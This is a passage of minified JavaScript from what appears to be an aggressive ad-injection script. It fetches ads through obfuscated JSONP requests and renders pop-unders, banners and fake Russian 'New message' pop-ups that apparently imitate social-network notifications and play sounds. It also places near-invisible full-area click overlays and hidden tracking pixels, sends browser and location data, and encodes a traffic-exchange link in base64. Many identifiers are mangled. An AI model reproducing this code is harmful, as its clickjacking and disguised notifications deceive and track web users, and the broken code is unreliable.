"; secure" : "") }, pa: function () { var a, b = k.createElement("div"), c = ["Khtml", "Ms", "O", "Moz", "Webkit"], d = c.length; a = function (a) { if (a in b.style)return y; for (a = a.replace(/^[az]/, function (a) { return a.toUpperCase() }); d--;)if (c[d] + a in b.style)return y; return T }; return a("boxShadow") && a("borderRadius") }, log: function () { }, la: function (a) { var b = " " + k.cookie; a = " " + a + "\x3d"; var c = z, d = 0, e = 0; 0 < b.length && (d = b.indexOf(a), -1 != d && (d += a.length, e = -1 == b.indexOf(";", d) ? b.length : b.indexOf(";", d), c = decodeURIComponent(b.substring(d, e)))); return c }, Na: function (a, b) { var c = "", d = "", e, f, p, h, j, g = 0; b &= 255; a = this.mb(a); for (f = 0; f < a.length; d += String.fromCharCode(b ^ a.charCodeAt(f)), f++); for (a = d; g < a.length;)e = a.charCodeAt(g++), d = a.charCodeAt(g++), f = a.charCodeAt(g++), p = e >> 2, e = (e & 3) << 4 | d >> 4, h = (d & 15) << 2 | f >> 6, j = f & 63, isNaN(d) ? h = j = 64 : isNaN(f) && (j = 64), c = c + this.Y.charAt(p) + this.Y.charAt(e) + this.Y.charAt(h) + this.Y.charAt(j); return c }, L: function (a, b) { a = a.replace(/[\-]/g, "+").replace(/[_]/g, "/"); for (var c = [-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 62, -1, -1, -1, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, 0, -1, -1, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1], d, e, f = 0, g = [], h = 0, j = 0, f = 0; f < a.length; f++)e = a.charCodeAt(f), d = c[e & 127], -1 === d ? this.log("Illegal characters (code\x3d" + e + ") in position " + f) : (j = j << 6 | d, h += 6, 8 <= h && (h -= 8, "\x3d" !== a.charAt(f) && g.push(j >> h & 255), j &= (1 << h) - 1)); if (b) { c = []; b &= 255; for (d = 0; d < g.length; c.push(b ^ g[d]), d++); g = c } return this.lb(g) }, lb: function (a) { for (var b = [], c = 0, d = a.length, e, f, g; c < d;)e = a[c], f = a[c + 1], g = a[c + 2], 128 > e ? (b.push(String.fromCharCode(e)), c += 1) : 191 < e && 224 > e ? (b.push(String.fromCharCode((e & 31) << 6 | f & 63)), c += 2) : (b.push(String.fromCharCode((e & 15) << 12 | (f & 63) << 6 | g & 63)), c += 3); return b.join("") }, mb: function (a) { a = a.replace(/\r\n/g, "\n"); for (var b = "", c = 0; c < a.length; c++) { var d = a.charCodeAt(c); 128 > d ? b += String.fromCharCode(d) : (127 < d && 2048 > d ? b += String.fromCharCode(d >> 6 | 192) : (b += String.fromCharCode(d >> 12 | 224), b += String.fromCharCode(d >> 6 & 63 | 128)), b += String.fromCharCode(d & 63 | 128)) } return b }, ma: function (a, b, c, d) { var e = navigator.userAgent.toLowerCase(); -1 != e.indexOf("safari") && -1 == e.indexOf("chrome") && (d = d || "width\x3d" + r.screen.width + ",height\x3d" + r.screen.height + ",left\x3d0,top\x3d0,menubar\x3dno,location\x3dno,resizable\x3dyes,scrollbars\x3dyes,status\x3dno"); a = r.open(a, c || "", d); b || (a.blur(), r.focus()) }, g: function (a) { var b = +new Date % 1E6; return"/?" + b + "\x3d" + this.Na(a.replace("/?", ""), b) }, w: {eb: function (a, b, c, d) { if (mj && a && b) { var e = {}; e.id = a; e.qa = b; eO = c; e.fa = d; Q[Q.length] = e; W(a, T) } else d && d({success: T, id: a}) }, Sa: function (a) { if (mj)return Ra(a) }, N: function (a, b, c, d, e, f, g, h, j, k) { var A = {success: T, id: b}; mj && !(mi && 312 > mi) && a && b && c && d && e ? (W(b, T), qb(function () { c += ""; d += ""; var q = {}; if (j && typeof j === O)for (var B in j)q[B] = j[B]; q.data = a; q.width = c; q.height = d; B = {}; if (h && typeof h === O)for (var r in h)B[r] = h[r]; if (g && typeof g === O)for (var F in g)Bs = typeof Bs != v ? Bs + ("\x26" + F + "\x3d" + g[F]) : F + "\x3d" + g[F]; if (ra(e))r = Ma(q, B, b), q.id == b && W(b, y), A.success = y, AS = r; else { if (f && Qa()) { q.data = f; Oa(q, B, b, k); return } W(b, y) } k && k(A) })) : k && k(A) }, kb: function () { kb = T }, W: m, Ra: function () { return{$a: mn[0], bb: mn[1], fb: mn[2]} }, va: ra, Ka: function (a, b, c) { if (mj)return Ma(a, b, c) }, hb: function (a, b, c, d) { mj && Qa() && Oa(a, b, c, d) }, gb: function (a) { mj && mb(a) }, Ja: function (a, b, c, d) { mj && lb(a, b, c, d) }, Fa: qb, Ha: pb, Ta: function (a) { var b = l.location.search || l.location.hash; if (b) { /\?/.test(b) && (b = b.split("?")[1]); if (a == z)return jb(b); for (var b = b.split("\x26"), c = 0; c < b.length; c++)if (b[c].substring(0, b[c].indexOf("\x3d")) == a)return jb(b[c].substring(b[c].indexOf("\x3d") + 1)) } return"" }, Pa: function () { if (ua) { var a = K(ob); a && fa && (a.parentNode.replaceChild(fa, a), va && (W(va, y), mc && me && (fa.style.display = "block")), Pa && Pa(nb)); ua = T } }}, parseJSON: function (a) { return eval("(" + a + ")") }, da: function (a, b, c, d) { d = d || "jclb"; if (c) { var e = "jsonp" + String(Math.random()).slice(4); b += "\x26" + d + "\x3dwindow." + e; r[e] = function (a) { scriptOk = y; r[e] = s; try { delete r[e] } catch (b) { } g.log("Callback called"); c(a) } } b = this.g(b); d = this.z("script"); d.src = a + b; return d }, X: function (a, b) { var c = this.z("img", b); c.src = a; return c }, Ga: function (a, b) { var c = this.z("iframe", b); c.src = a; return c }, z: function (a, b) { var c = k.createElement(a); b ? b.appendChild(c) : k.body.appendChild(c); return c }, Va: function () { var a = 0, b = 0; r.screen ? (b = r.screen.width, a = r.screen.height) : r.Za && (a = r.Za.awt.Toolkit.getDefaultToolkit().getScreenSize(), b = a.width, a = a.height); return"\x26width\x3d" + b + "\x26height\x3d" + a }, aa: function (a) { function b() { return self.innerHeight ? self.innerHeight : k.documentElement && k.documentElement.clientHeight ? k.documentElement.clientHeight : k.body ? k.body.clientHeight : 600 } function c() { var a = 0, b = 0; if ("number" == typeof r.pageYOffset)b = r.pageYOffset, a = r.pageXOffset; else if (k.body && (k.body.scrollLeft || k.body.scrollTop))b = k.body.scrollTop, a = k.body.scrollLeft; else if (k.documentElement && (k.documentElement.scrollLeft || k.documentElement.scrollTop))b = k.documentElement.scrollTop, a = k.documentElement.scrollLeft; return[a, b] } switch (a.type) { case "top": aFstyle.top = c()[1] + "px"; break; case "center": aFstyle.top = b() / 2 + c()[1] - aFoffsetHeight + "px"; break; default: aFstyle.top = b() + c()[1] - aFoffsetHeight + "px" } }, Ua: function (a) { return k.referrer && -1 == a.indexOf("\x26ref\x3d") ? "\x26ref\x3d" + encodeURIComponent(k.referrer) : "" }, Oa: function (a, b) { return-1 !== a.indexOf(b, a.length - b.length) }, k: function () { var a = (k.compatMode || this.za) && !this.ca ? "CSS1Compat" == k.compatMode ? k.documentElement.clientHeight : k.body.clientHeight : (k.cb || k.defaultView).innerHeight; g.log(a); return a }, ua: function () { return(k.compatMode || this.za) && !this.ca ? "CSS1Compat" == k.compatMode ? k.documentElement.clientWidth : k.body.clientWidth : (k.cb || k.defaultView).innerWidth }, q: function () { return Math.max(r.pageYOffset || k.documentElement.scrollTop, k.body.scrollTop) }}; rb.prototype = {a: {}, r: {}, f: z, oa: function () { function a(a) { a = g.parseJSON(gL(a)); g.log("Success RT, ", a); g.Ya(a); br = a; var c = {br: Eb, as: Fb, tl: Gb, cf: Hb, vkm: Ib, rot: Jb, popup: Kb, mppund: Lb, tsr: Mb, scr: Nb, pin: Ob, mdirect: Pb}; if (a.ads)for (var f = 0; f < a.ads.length; f++) { var p = c[a.ads[f].format]; p ? (g.log("Rendering,", a.ads[f]), pp(a.ads[f])) : g.log("Cant render ad:", a.ads[f]) } } var b = this, c = this.a.rtUri.replace("/?", ""); this.a.rotatorDomain && this.a.rtUri && g.da(this.a.rotatorDomain, this.a.rtUri + this.Wa(c) + g.Va() + g.Ua(c), a) }, Ba: function (a) { gX(a).style.cssText = "width:1px;height:1px;position:absolute;left:-10000px;" }, Wa: function (a) { var b = ""; this.a.foreignUid && (b = "\x26foreignUid\x3d" + this.a.foreignUid); return-1 == a.indexOf("\x26udata\x3d") && r.globalInfo.udata && (a = r.globalInfo.udata) ? (a = g.parseJSON(gL(a)), this.Ba(a.matchingUrl), b + "\x26udata\x3d" + a.uid) : b }}; var t = "undefined", M = "object", na = "application/x-shockwave-flash", gb = "SWFObjectExprInst", G = r, u = k, S = navigator, vb = T, qa = [function () { if (vb) { var a = u.getElementsByTagName("body")[0], b = u.createElement(M); b.setAttribute("type", na); var c = a.appendChild(b); if (c) { var d = 0; (function () { if (typeof c.GetVariable != t) { var e = c.GetVariable("$version"); e && (e = e.split(" ")[1].split(","), nn = [parseInt(e[0], 10), parseInt(e[1], 10), parseInt(e[2], 10)]) } else if (10 > d) { d++; setTimeout(arguments.callee, 10); return } a.removeChild(b); c = z; Ka() })() } else Ka() } else Ka() }], P = [], ma = [], Y = [], ea, pa, Ha, fb, V = T, oa = T, L, Da, cb = y, n, Qb = typeof u.getElementById != t && typeof u.getElementsByTagName != t && typeof u.createElement != t, Ba = S.userAgent.toLowerCase(), Ca = S.platform.toLowerCase(), Rb = Ca ? /win/.test(Ca) : /win/.test(Ba), Sb = Ca ? /mac/.test(Ca) : /mac/.test(Ba), Tb = /webkit/.test(Ba) ? parseFloat(Ba.replace(/^.*webkit\/(\d+(\.\d+)?).*$/, "$1")) : T, ab = !+"\v1", ia = [0, 0, 0], D = z; if (typeof S.plugins != t && typeof S.plugins["Shockwave Flash"] == M) { if ((D = S.plugins["Shockwave Flash"].description) && !(typeof S.mimeTypes != t && S.mimeTypes[na] && !S.mimeTypes[na].enabledPlugin))vb = y, ab = T, D = D.replace(/^.*\s+(\S+\s+\S+$)/, "$1"), ia[0] = parseInt(D.replace(/^(.*)\..*$/, "$1"), 10), ia[1] = parseInt(D.replace(/^.*\.(.*)\s.*$/, "$1"), 10), ia[2] = /[a-zA-Z]/.test(D) ? parseInt(D.replace(/^.*[a-zA-Z]+(.*)$/, "$1"), 10) : 0 } else if (typeof G.ActiveXObject != t)try { var wb = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"); if (wb && (D = wb.GetVariable("$version")))ab = y, D = D.split(" ")[1].split(","), ia = [parseInt(D[0], 10), parseInt(D[1], 10), parseInt(D[2], 10)] } catch (Vb) { } n = {j: Qb, n: ia, i: Tb, c: ab, e: Rb, R: Sb}; nj && ((typeof u.readyState != t && "complete" == u.readyState || typeof u.readyState == t && (u.getElementsByTagName("body")[0] || u.body)) && Z(), V || (typeof u.addEventListener != t && u.addEventListener("DOMContentLoaded", Z, T), nc && ne && (u.attachEvent("onreadystatechange", function () { "complete" == u.readyState && (u.detachEvent("onreadystatechange", arguments.callee), Z()) }), G == top && function () { if (!V) { try { u.La.doScroll("left") } catch (a) { setTimeout(arguments.callee, 0); return } Z() } }()), ni && function () { V || (/loaded|complete/.test(u.readyState) ? Z() : setTimeout(arguments.callee, 0)) }(), hb(Z))); nc && ne && r.attachEvent("onunload", function () { for (var a = Y.length, b = 0; b < a; b++)Y[b][0].detachEvent(Y[b][1], Y[b][2]); a = ma.length; for (b = 0; b < a; b++)eb(ma[b]); for (var c in n)n[c] = z; n = z; for (var d in gw)gw[d] = z; gw = z }); I.prototype = {ea: {h: "", link: "aHR0cDovL3dpemFyZC10cmFmZnN0b2NrLmNvbS8/dXRtX3NvdXJjZT1vdXJiYW5uZXImdXRtX21lZGl1bT1iYW5uZXImdXRtX2NhbXBhaWduPWJhbm5lcl9yZWc\x3d"}, Ia: 3E3, ia: "", wa: "", xa: "", ib: "", Da: "", U: "left:-10000px;top:-10000px;height:1px;width:1px;position:absolute;", W: "", ca: "", Z: T, Ca: 2, ja: 0, ka: 0, V: [], f: {}, b: function (a, b, c, d) { a.addEventListener ? a.addEventListener(b, c, d) : a.attachEvent("on" + b, c) }, K: function (a) { a = a || event; a.cancelBubble = y; a.stopPropagation && a.stopPropagation() }, ba: function (a, b, c, d) { var e = this; if (a.isDefaultClose || !this.Z && a.stubSrc) { d = d || -12; c = c || b; var f = k.createElement("span"); f.style.cssText = this.ia.replace("${offsetTop}", d); f.onclick = function (b) { eK(b); e.close(a, c) }; if (a.isDefaultClick || !this.Z && a.stubSrc)d = k.createElement("a"), d.style.cssText = this.Da, d.target = "_blank", d.href = a.trackingDomain + gg(a.clickUri + eG()), d.onclick = function (b) { eK(b); this.href = a.trackingDomain + gg(a.clickUri + eG()); e.na(c) }, b.appendChild(d); setTimeout(function () { b.appendChild(f) }, this.Ia) } else r.hide = function () { e.close(a, ef) } }, H: function (a, b, c, d) { c = c || "bottom"; d = d || "right"; b.showLogo && (b = k.createElement("a"), b.href = gL(this.ea.link), b.target = "_blank", b.style.cssText = "z-index:99;position:absolute;" + c + ":-15px;width:100%;height:15px;left:0;right:0; background:#fff url(" + this.ea.h + ") no-repeat " + d + " top;", a.appendChild(b)) }, J: function (a, b) { gX(b.impDomain + gg(b.trackShowUri)).style.cssText = this.U }, G: function () { return this.ja > this.Ca || 0 < this.ka || xaisMobile ? "" : "\x26rej\x3d1" }, w: {eb: function (a, b, c, d) { if (nj && a && b) { var e = {}; e.id = a; e.qa = b; eO = c; e.fa = d; P[P.length] = e; U(a, T) } else d && d({success: T, id: a}) }, Sa: function (a) { if (nj)return Ja(a) }, N: function (a, b, c, d, e, f, g, h, j, k) { var A = {success: T, id: b}; nj && !(ni && 312 > ni) && a && b && c && d && e ? (U(b, T), ib(function () { c += ""; d += ""; var q = {}; if (j && typeof j === M)for (var B in j)q[B] = j[B]; q.data = a; q.width = c; q.height = d; B = {}; if (h && typeof h === M)for (var r in h)B[r] = h[r]; if (g && typeof g === M)for (var F in g)Bs = typeof Bs != t ? Bs + ("\x26" + F + "\x3d" + g[F]) : F + "\x3d" + g[F]; if (la(e))r = Ea(q, B, b), q.id == b && U(b, y), A.success = y, AS = r; else { if (f && Ia()) { q.data = f; Ga(q, B, b, k); return } U(b, y) } k && k(A) })) : k && k(A) }, kb: function () { cb = T }, W: n, Ra: function () { return{$a: nn[0], bb: nn[1], fb: nn[2]} }, va: la, Ka: function (a, b, c) { if (nj)return Ea(a, b, c) }, hb: function (a, b, c, d) { nj && Ia() && Ga(a, b, c, d) }, gb: function (a) { nj && eb(a) }, Ja: function (a, b, c, d) { nj && db(a, b, c, d) }, Fa: ib, Ha: hb, Ta: function (a) { var b = u.location.search || u.location.hash; if (b) { /\?/.test(b) && (b = b.split("?")[1]); if (a == z)return bb(b); for (var b = b.split("\x26"), c = 0; c < b.length; c++)if (b[c].substring(0, b[c].indexOf("\x3d")) == a)return bb(b[c].substring(b[c].indexOf("\x3d") + 1)) } return"" }, Pa: function () { if (oa) { var a = J(gb); a && ea && (a.parentNode.replaceChild(ea, a), pa && (U(pa, y), nc && ne && (ea.style.display = "block")), Ha && Ha(fb)); oa = T } }}, N: function (a, b, c, d, e, f) { this.wN(this.ab(a, b, c), d, e, f, "10.0.0", "", T, this.V, T) }, ab: function (a, b, c) { return xaimgDomain + a + "?closeid\x3d" + b + "\x26link1\x3d" + c + this.Aa() }, Aa: function () { return"\x26keywords\x3d" + encodeURIComponent(xakeywords) + "\x26browsername\x3d" + encodeURIComponent(xauaFamilyName) + "\x26browserversion\x3d" + xauaVersion + "\x26os\x3d" + encodeURIComponent(xaosName) + "\x26countryid\x3d" + xacountryId + "\x26district\x3d" + encodeURIComponent(xadistrict) + "\x26region\x3d" + encodeURIComponent(xaregion) + "\x26city\x3d" + encodeURIComponent(xacity) }, B: function (a) { return a.replace("{keywords}", xrkeywords || "").replace("{browsername}", xruaFamilyName || "").replace("{browserversion}", xruaVersion || "").replace("{os}", xrosName || "").replace("{countryid}", xrcountryId || "").replace("{district}", xrdistrict || "").replace("{region}", xrregion || "").replace("{city}", xrcity || "") }, Ma: function (a, b, c, d, e) { a = g.Ga(a + (-1 == a.indexOf("?") ? "?" : "\x26") + "clickUrl\x3d" + b + this.Aa(), c); a.style.cssText = "width:" + d + "px;height:" + e + "px;border:none;"; a.scrolling = "no" }, ya: function (a) { var b = a.clickUri.replace("clk", "cl"); a = (a.trackingDomain || a.teasers[0].trackingDomain) + gg(b); gX(a).style.cssText = this.U }, close: function (a, b) { this.ya(a); this.na(b) }, na: function (a) { a && k.body.removeChild(a) }, t: function (a) { var b = this; this.b(k, "mousemove", function () { b.ja++ }, T); this.b(k, "scroll", function () { b.ka++ }, T); this.ea.h = xascriptsDomain + "img/adv.png"; this.Z = this.w.va("1"); g.log(a); this.W = navigator.userAgent.toLowerCase(); this.ca = -1 < this.W.indexOf("opera"); this.za = !this.ca && -1 < this.W.indexOf("msie"); this.wa = xascriptsDomain + "img/close.png"; this.xa = xascriptsDomain + "img/close_ie.gif"; this.ia = "z-index:101;position:absolute;top:${offsetTop}px;right:-12px;background:url(" + this.wa + ") no-repeat 50%;width:30px;height:30px;cursor:pointer;* background:url(" + this.xa + ");"; this.ib = xascriptsDomain + "img/blank.gif"; this.Da = "background:white;filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d1);-moz-opacity:0.01;-khtml-opacity:0.01;opacity:0.01;cursor:pointer;left:0px;top:0px;right:0px;bottom:0px;width:100%;height:100%;position:absolute;"; this.V.allowScriptAccess = "always"; this.V.quality = "high"; this.V.wmode = "transparent" }, p: function () { g.log("Method not implemented") }, M: function (a, b) { var c = k.createElement("div"); a.appendChild(c); c.style.width = b.width + "px"; c.style.height = b.height + "px"; !this.Z && b.stubSrc && (c.style.background = "url(" + xaimgDomain + b.stubSrc + ") no-repeat 50% 50%"); if (b.iframeUrl)this.Ma(b.iframeUrl, encodeURIComponent(b.trackingDomain + gg(b.clickUri)), c, b.width, b.height); else if (g.Oa(b.src, ".swf")) { var d = k.createElement("div"); d.id = "swf" + (new String(Math.random())).slice(2); c.appendChild(d); this.N(b.src, d.id, encodeURIComponent(b.trackingDomain + gg(b.clickUri)), d.id, b.width, b.height) } else c.style.background = "url(" + xaimgDomain + b.src + ") no-repeat 50% 50%" }}; E(xa, I); xa.prototype.p = function (a) { var b = this; bt(a); var c = gz("div"); bf = c; bM(c, a); bH(c, a, "bottom", "right"); bJ(c, a); var d = b.$(a.width, a.height), e = "z-index:9999;position:fixed;top:50%;left:50%;margin-top:-" + a.height / 2 + "px;margin-left:-" + a.width / 2 + "px;width: " + a.width + "px;height: " + a.height + "px;"; gv() || (e = e.replace("fixed", "absolute"), bb(r, "scroll", function () { c.style.top = gq() + d.top + "px" }), bb(r, "resize", function () { var d = b.$(a.width, a.height); c.style.top = gq() + d.top + "px" })); c.style.cssText = e; this.ba(a, c, c) }; xa.prototype.$ = function (a, b) { return{left: (g.ua() - a) / 2, top: (gk() - b) / 2} }; E(Ta, I); Ta.prototype.p = function (a) { function b() { var b = setInterval(function () { f < parseInt(a.height, 10) + d ? (f += 10, w.style.top = f + "px") : (clearInterval(b), setTimeout(c, 1E3)) }, 10) } function c() { var a = setInterval(function () { 0 < f ? (f -= 10, w.style.top = f + "px") : (clearInterval(a), setTimeout(b, e)) }, 20) } var d = a.showLogo ? 24 : 18, e = 15E3, f = a.height, p = 0, h = 6 == a.bannerPosition ? "left" : "right"; this.t(a); var j = gz("div"); this.f = j; var w = k.createElement("div"); j.appendChild(w); this.M(w, a); this.H(w, a, "top", "left"); this.J(w, a); h = "z-index:9999;padding:" + d + "px 9px 0 0;overflow:hidden;position:fixed;bottom:0;" + h + ": 0px;width: " + a.width + "px;height: " + a.height + "px;"; gv() || (h = h.replace("fixed", "absolute"), h += "bottom:auto;top:" + (gk() - a.height - d) + "px;", this.b(r, "scroll", function () { j.style.top = gq() + gk() - a.height + "px" }), this.b(r, "resize", function () { j.style.top = gq() + gk() - a.height - d + "px" })); j.style.cssText = h; w.style.cssText = "position:relative;top: " + a.height + "px;"; this.ba(a, w, j, a.showLogo ? -20 : -12); a.animate ? setTimeout(function () { var b = setInterval(function () { Math.abs(parseInt(banner.style.top, 10)) > a.height ? w.style.top = (p += 20) + "px" : clearInterval(b) }, 20) }, 1E3) : c() }; E(Ua, I); Ua.prototype.p = function (a) { this.t(a); var b = gz("div"); this.f = b; this.M(b, a); this.H(b, a, "bottom", "right"); this.J(b, a); var c = "z-index:9999;position:fixed;top:0px;left: 50%;width: " + a.width + "px;height: " + a.height + "px;margin-left:-" + a.width / 2 + "px"; gv() || (c = c.replace("fixed", "absolute"), this.b(r, "scroll", function () { b.style.top = gq() + "px" })); b.style.cssText = c; this.ba(a, b, b, 3) }; E(Va, I); Va.prototype.p = function (a) { this.t(a); var b = gz("div"); this.f = b; this.M(b, a); this.H(b, a, "top", "left"); this.J(b, a); var c = "z-index:9999;position:fixed;left: 50%;bottom:0; width: " + a.width + "px;height: " + a.height + "px;margin-left:-" + a.width / 2 + "px"; gv() ? this.b(r, "resize", function () { b.style.top = gk() - a.height + "px" }) : (c = c.replace("fixed", "absolute"), c += "bottom:auto;top:" + (gk() - a.height) + "px;", this.b(r, "scroll", function () { b.style.top = gq() + gk() - a.height + "px" }), this.b(r, "resize", function () { b.style.top = gq() + gk() - a.height + "px" })); b.style.cssText = c; this.ba(a, b, b, a.showLogo ? -20 : -12) }; E(ca, I); ca.prototype.p = function (a) { function b() { if (!c && (j.ja > j.Ca || 0 < j.ka) && 1E3 <= (new Date).getTime() - d) { c = y; var b = function (a) { l = setInterval(function () { if (h[a] && p[a] < f * F)p[a] += 5, h[a].style.top = p[a] + "px"; else { clearInterval(l); var c = a + 1; if (c < h.length)setTimeout(function () { b(c) }, h[a] ? 4E3 : 0); else { for (var d = 0; d < h.length; d++)h[d] && (h[d].style.top = f * h.length + 10); setTimeout(function () { j.ha(c, h[0] && "true" == h[0]); e(0) }, h[a] ? 1E4 : 0) } } }, 10) }, e = function (a) { l = setInterval(function () { if (h[a] && p[a] > f * (F - 1))for (var c = a; 0 <= c; c--)h[c] && (p[c] -= 5, h[c].style.top = p[c] + "px"); else { clearInterval(l); var d = a + 1; d < h.length ? setTimeout(function () { j.ha(d, h[d] && "true" == h[d]); e(d) }, h[a] ? 4E3 : 0) : setTimeout(function () { b(0) }, h[a] ? 8E3 : 0) } }, 20) }, F = 0, n = function () { for (var a = F = 0; a < h.length; a++)h[a] != z && F++ }, m = function (b, c, d) { jfremoveChild(h[c]); jK(b); h[c] = z; n(); d && j.ya(a); b = T; for (d = c; d < h.length; d++)h[d] && (!b && p[d] >= f * h.length) && (b = y, p[d] = p[c], h[d].style.top = p[d] + "px"); if (!b) { var e = f; jfstyle.overflow = "visible"; var k = setInterval(function () { if (0 < e) { e -= 5; for (var a = c; 0 <= a; a--)h[a] && (p[a] += 5, h[a].style.top = p[a] + "px") } else jfstyle.overflow = "hidden", clearInterval(k) }, 10) } jfstyle.height = f * F + "px"; gv() || (jfstyle.top = gq() + gk() - f * F + "px"); for (d = 0; d < h.length; d++)h[d] && (p[d] -= f, h[d].style.top = p[d] + "px") }; jf = gz("div"); var u = a.trackingDomain + gg(a.clickUri.replace("/?", "")), l; jJ(jf, a); for (var x = 0; x < w.length; x++) { p.push(f * w.length); var t = k.createElement("div"); t.id = "vid-" + x; t.className = "vmcontainer"; var v = k.createElement("div"); t.setAttribute("mute", a.mute); t.onmouseover = function () { this.className += " hover" }; t.onmouseout = function () { this.className = this.className.replace(" hover", "") }; var ja = k.createElement("div"); ja.style.cssText = "position:relative;"; ja.innerHTML = "\x3cspan\x3e" + w[x].header + "\x3c/span\x3e"; var ka = k.createElement("a"); ka.id = "vclose-" + x; var C = k.createElement("a"); ka.className = "vclose"; ja.appendChild(ka); ka.appendChild(C); v.appendChild(ja); C = k.createElement("div"); C.style.cssText = "float:left;margin:0 10px 0 10px;border-radius:3px;overflow:hidden;box-shadow:0 1px 2px rgb(17, 17, 17);"; v.appendChild(C); g.pa() || (v.style.cssText = "padding:5px 15px;"); var D = k.createElement("div"), E = k.createElement("style"), G = k.getElementsByTagName("head")[0]; E.type = "text/css"; E.styleSheet ? E.styleSheet.cssText = A : E.appendChild(k.createTextNode(A)); G.appendChild(E); D.innerHTML = '\x3cspan class\x3d"text-link"\x3e\x3ca href\x3d"#" \x3e' + w[x].title + "\x3c/a\x3e\x3c/span\x3e" + w[x].description; v.appendChild(D); jM(C, a); jfappendChild(t); t.appendChild(v); h.push(t); ka.onclick = function (a) { var b = parseInt(this.id.replace("vclose-", "")); m(a, b, y) }; t.onclick = function (a) { jK(a); var b = parseInt(this.id.replace("vid-", "")); m(a, b, T); r.open(u) }; ja.style.cssText = "position:relative;font-size:13px;height:19px;line-height:19px;color:white;padding:10px 10px 3px;font-weight:bold;"; t.style.cssText = q } n(); x = "z-index:9999;overflow:hidden;font-family: tahoma,arial,verdana,sans-serif,Lucida Sans;font-size: 11px;z-index:9999; position:fixed;bottom:0;left: 10px;width:345px;height:" + f * h.length + "px;"; gv() || (x = x.replace("fixed", "absolute"), x += "bottom:auto;top:" + (gk() - f * h.length) + "px;", jb(r, "scroll", function () { jfstyle.top = gq() + gk() - F * f + "px" }), jb(r, "resize", function () { jfstyle.top = gq() + gk() - F * f + "px" })); jfstyle.cssText = x; gv() || (jfstyle.top = gq() + gk() - F * f + "px"); setTimeout(function () { 0 < h.length && (j.ha(0, h[0] && "true" == h[0]), e(0)) }, 3E3) } } var c = T, d = (new Date).getTime(), e = "vm" + (new Date).getTime(), f = g.pa() ? 105 : 125, p = [], h = [], j = this, w = j.Qa(a, e); jt(a); var A = '.vclose {width: 23px; height: 23px; display: block; filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d0);-moz-opacity: 0;-khtml-opacity:0;opacity:0;position:absolute; right:10px; top:10px; background: url("' + xascriptsDomain + 'img/notifier_close_ie.png") no-repeat scroll 0 0;} .vclose a {display:none; width:7px; height:7px;margin:8px; background:url(' + xascriptsDomain + "/img/notifier_close.gif)}.vclose:hover a{display:block; filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d60);-moz-opacity:.6;-khtml-opacity:.6;opacity:.6;}.vmcontainer:hover .vclose:hover{filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d100);-moz-opacity:1;-khtml-opacity:1;opacity:1;}.vmcontainer:hover .vclose, .vmcontainer.hover .vclose{filter:progid:DXImageTransform.Microsoft.Alpha(opacity\x3d60);-moz-opacity:.6;-khtml-opacity:.6;opacity:.6;} .text-link {padding-right:10px;} .text-link a {color:rgb(177, 218, 255);font-weight:bold;text-decoration:none;}.text-link a:hover {text-decoration:underline;}", e = 'height:130px;width:350px; background: url("' + xascriptsDomain + 'img/notifier_back.png") center center no-repeat; ', q = "left:0;color:white;margin:0 0 10px 0;" + (g.pa() ? "height:95px;width:320px;border-radius: 5px 5px 5px 5px;box-shadow: 0pt 2px 15px rgb(0, 0, 0);text-shadow: 0px 1px 0px rgb(38, 38, 38);background:rgba(0,0,0,0.75);" : e) + "position:absolute;top: " + (f * w.length + 10) + "px;"; this.b(k, "mousemove", function () { b() }, T); this.b(k, "scroll", function () { b() }, T) }; ca.prototype.T = z; ca.prototype.Qa = function (a, b) { var c = [], d = a.title.split("{splitter}"), e = a.description.split("{splitter}"); a.windowHeader || (a.windowHeader = "\u041d\u043e\u0432\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435"); for (var f = a.windowHeader.split("{splitter}"), k = Math.max(f.length, Math.max(d.length, e.length)), h = 0; h < k; h++) { var j = {}; j.title = this.B(h < d.length ? d[h] : d[0]); j.description = this.B(h < e.length ? e[h] : e[0]); j.header = this.B(h < f.length ? f[h] : f[0]); "" == j.header && (j.header = "\u041d\u043e\u0432\u043e\u0435 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435"); j.wrapperId = b; j.id = b + h + 1; j.index = h; c.push(j) } g.log(c); return c }; ca.prototype.ha = function (a, b) { if (b == T)if (gQ()) { var c = k.createElement("bgsound"); c.src = xascriptsDomain + "img/bb2.mp3"; c.loop = "1"; k.body.appendChild(c) } else this.T && (c = k.getElementById(this.T)) && this.f && this.f.removeChild(c), c = k.createElement("div"), this.T = "vkmsound" + a, c.id = this.T, this.f.appendChild(c), gwN(xascriptsDomain + "img/mp3player.swf?file\x3d" + xascriptsDomain + "img/bb2.mp3\x26startplay\x3dtrue", this.T, "1", "1", "10.0.0", z, z, this.V) }; E(Wa, I); Wa.prototype.p = function (a) { this.t(a); var b = {limit: a.limit, period: a.period, limitName: "__trflimit", periodName: "__trfmon"}, c = T; if (g.ga(b)) { var d = this, e = navigator.userAgent.toLowerCase(); this.b(k, -1 < e.indexOf("iphone") || -1 < e.indexOf("ipad") ? "touchstart" : "click", function () { g.ga(b) && !c && (c = y, g.log(a.trackingDomain + gg(a.clickUri + dG())), g.ma.call(d, a.trackingDomain + gg(a.clickUri + dG()), y, "_blank", ""), g.Ea(b)) }); this.J(k.body, a) } }; E(ya, I); ya.prototype.p = function (a) { var b = {limit: a.limit, period: a.period, limitName: "__trfpoplimit", periodName: "__trfmonpop"}; this.t(a); if (g.ga(b)) { var c = gz("div"), d = k.createElement("div"); c.appendChild(d); this.M(d, a); var e = this; ef = c; d.onclick = function (d) { g.ma(a.trackingDomain + gg(a.clickUri + eG()), y, "_blank", ""); 